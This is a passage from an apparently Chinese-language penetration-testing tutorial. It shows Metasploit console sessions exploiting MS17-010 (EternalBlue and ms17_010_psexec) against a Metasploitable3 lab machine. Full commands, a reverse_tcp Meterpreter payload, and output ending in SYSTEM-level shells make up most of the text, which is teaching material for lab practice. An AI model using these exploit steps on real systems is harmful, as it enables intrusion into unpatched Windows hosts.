class=\"hljs-number\">20<\/span> <span class=\"hljs-number\">008<\/span> <span class=\"hljs-string\">R2<\/span> <span class=\"hljs-string\">Standard<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">0x00000020<\/span> <span class=\"hljs-number\">37<\/span> <span class=\"hljs-number\">36<\/span> <span class=\"hljs-number\">30<\/span> <span class=\"hljs-number\">31<\/span> <span class=\"hljs-number\">20<\/span> <span class=\"hljs-number\">53<\/span> <span class=\"hljs-number\">65<\/span> <span class=\"hljs-number\">72<\/span> <span class=\"hljs-number\">76<\/span> <span class=\"hljs-number\">69<\/span> <span class=\"hljs-number\">63<\/span> <span class=\"hljs-number\">65<\/span> <span class=\"hljs-number\">20<\/span> <span class=\"hljs-number\">50<\/span> <span class=\"hljs-number\">61<\/span> <span class=\"hljs-number\">63<\/span> <span class=\"hljs-number\">7601 <\/span><span class=\"hljs-string\">Service<\/span> <span class=\"hljs-string\">Pac<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">0x00000030<\/span> <span class=\"hljs-string\">6b<\/span> <span class=\"hljs-number\">20<\/span> <span class=\"hljs-number\">31<\/span> <span class=\"hljs-string\">k<\/span> <span class=\"hljs-number\">1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">+<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Target<\/span> <span class=\"hljs-string\">arch<\/span> <span class=\"hljs-string\">selected<\/span> <span class=\"hljs-string\">valid<\/span> <span class=\"hljs-string\">for<\/span> <span class=\"hljs-string\">arch<\/span> <span class=\"hljs-string\">indicated<\/span> <span class=\"hljs-string\">by<\/span> <span class=\"hljs-string\">DCE\/RPC<\/span> <span class=\"hljs-string\">reply<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Trying<\/span> <span class=\"hljs-string\">exploit<\/span> <span class=\"hljs-string\">with<\/span> <span class=\"hljs-number\">12<\/span> <span class=\"hljs-string\">Groom<\/span> <span class=\"hljs-string\">Allocations.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Sending<\/span> <span class=\"hljs-string\">all<\/span> <span class=\"hljs-string\">but<\/span> <span class=\"hljs-string\">last<\/span> <span class=\"hljs-string\">fragment<\/span> <span class=\"hljs-string\">of<\/span> <span class=\"hljs-string\">exploit<\/span> <span class=\"hljs-string\">packet<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Starting<\/span> <span class=\"hljs-string\">non-paged<\/span> <span class=\"hljs-string\">pool<\/span> <span class=\"hljs-string\">grooming<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">+<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Sending<\/span> <span class=\"hljs-string\">SMBv2<\/span> <span class=\"hljs-string\">buffers<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">+<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Closing<\/span> <span class=\"hljs-string\">SMBv1<\/span> <span class=\"hljs-string\">connection<\/span> <span class=\"hljs-string\">creating<\/span> <span class=\"hljs-string\">free<\/span> <span class=\"hljs-string\">hole<\/span> <span class=\"hljs-string\">adjacent<\/span> <span class=\"hljs-string\">to<\/span> <span class=\"hljs-string\">SMBv2<\/span> <span class=\"hljs-string\">buffer.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Sending<\/span> <span class=\"hljs-string\">final<\/span> <span class=\"hljs-string\">SMBv2<\/span> <span class=\"hljs-string\">buffers.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Sending<\/span> <span class=\"hljs-string\">last<\/span> <span class=\"hljs-string\">fragment<\/span> <span class=\"hljs-string\">of<\/span> <span class=\"hljs-string\">exploit<\/span> <span class=\"hljs-string\">packet!<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"27\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Receiving<\/span> <span class=\"hljs-string\">response<\/span> <span class=\"hljs-string\">from<\/span> <span class=\"hljs-string\">exploit<\/span> <span class=\"hljs-string\">packet<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"28\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">+<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">ETERNALBLUE<\/span> <span class=\"hljs-string\">overwrite<\/span> <span class=\"hljs-string\">completed<\/span> <span class=\"hljs-string\">successfully<\/span> <span class=\"hljs-string\">(0xC000000D)!<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"29\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Sending<\/span> <span class=\"hljs-string\">egg<\/span> <span class=\"hljs-string\">to<\/span> <span class=\"hljs-string\">corrupted<\/span> <span class=\"hljs-string\">connection.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"30\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Triggering<\/span> <span class=\"hljs-string\">free<\/span> <span class=\"hljs-string\">of<\/span> <span class=\"hljs-string\">corrupted<\/span> <span class=\"hljs-string\">buffer.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"31\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Meterpreter<\/span> <span class=\"hljs-string\">session<\/span> <span class=\"hljs-number\">1<\/span> <span class=\"hljs-string\">opened<\/span> <span class=\"hljs-string\">(192.168.177.143:4444<\/span> <span class=\"hljs-string\">-&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:49655)<\/span> <span class=\"hljs-string\">at<\/span> <span class=\"hljs-number\">2019-04-26 17:40:54<\/span> <span class=\"hljs-string\">+0800<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"32\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">+<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"33\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">+<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"34\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">+<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"35\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"36\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"37\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter &gt; sysinfo<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"38\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Computer : METASPLOITABLE3<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"39\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">OS : Windows 2008 R2 (Build 7601, Service Pack 1).<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"40\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Architecture : x64<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"41\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">System Language : en_US<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"42\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Domain : WORKGROUP<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"43\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Logged On Users : 2<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"44\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Meterpreter : x64\/windows<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"45\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter &gt; getuid<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"46\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Server username: NT AUTHORITY\\SYSTEM<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"47\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter &gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"48\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"49\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<h4 class=\"heading\">7\u3001MS17-010 EternalRomance\/EternalSynergy\/EternalChampion<\/h4>\n<p><code>MS17-010 EternalRomance\/EternalSynergy\/EternalChampion SMB Remote Windows Code Execution<\/code>\u653b\u51fb\u6a21\u5757\u4e5f\u53ef\u7528\u4e8e<code>MS17-0101<\/code>\u6f0f\u6d1e\u5229\u7528\u3002\u800c\u4e14\u6bd4<code>EnternalBlue<\/code>\u66f4\u53ef\u9760\uff0c\u4e0d\u8fc7\u9700\u8981\u547d\u540d\u7ba1\u9053\u3002<\/p>\n<h5 class=\"heading\">\u600e\u4e48\u505a<\/h5>\n<p>\u4f7f\u7528\u6a21\u5757<code>ms17_010_psexec<\/code><\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">use<\/span> <span class=\"hljs-string\">exploit\/windows\/smb\/ms17_010_psexec<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/smb\/ms17_010_psexec)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/smb\/ms17_010_psexec)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">PAYLOAD<\/span> <span class=\"hljs-string\">windows\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">PAYLOAD<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-string\">windows\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/smb\/ms17_010_psexec)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">LHOST<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">LHOST<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/smb\/ms17_010_psexec)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">exploit<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Started<\/span> <span class=\"hljs-string\">reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">handler<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><span class=\"hljs-string\">:4444<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-attr\">192.168.177.144:445 - Target OS:<\/span> <span class=\"hljs-string\">Windows<\/span> <span class=\"hljs-string\">Server<\/span> <span class=\"hljs-number\">2008 <\/span><span class=\"hljs-string\">R2<\/span> <span class=\"hljs-string\">Standard<\/span> <span class=\"hljs-number\">7601 <\/span><span class=\"hljs-string\">Service<\/span> <span class=\"hljs-string\">Pack<\/span> <span class=\"hljs-number\">1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Built<\/span> <span class=\"hljs-string\">a<\/span> <span class=\"hljs-string\">write-what-where<\/span> <span class=\"hljs-string\">primitive...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">+<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Overwrite<\/span> <span class=\"hljs-string\">complete...<\/span> <span class=\"hljs-string\">SYSTEM<\/span> <span class=\"hljs-string\">session<\/span> <span class=\"hljs-string\">obtained!<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Selecting<\/span> <span class=\"hljs-string\">PowerShell<\/span> <span class=\"hljs-string\">target<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Executing<\/span> <span class=\"hljs-string\">the<\/span> <span class=\"hljs-string\">payload...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">+<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Service<\/span> <span class=\"hljs-string\">start<\/span> <span class=\"hljs-string\">timed<\/span> <span class=\"hljs-string\">out,<\/span> <span class=\"hljs-string\">OK<\/span> <span class=\"hljs-string\">if<\/span> <span class=\"hljs-string\">running<\/span> <span class=\"hljs-string\">a<\/span> <span class=\"hljs-string\">command<\/span> <span class=\"hljs-string\">or<\/span> <span class=\"hljs-string\">non-service<\/span> <span class=\"hljs-string\">executable...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Sending<\/span> <span class=\"hljs-string\">stage<\/span> <span class=\"hljs-string\">(179779<\/span> <span class=\"hljs-string\">bytes)<\/span> <span class=\"hljs-string\">to<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Meterpreter<\/span> <span class=\"hljs-string\">session<\/span> <span class=\"hljs-number\">2<\/span> <span class=\"hljs-string\">opened<\/span> <span 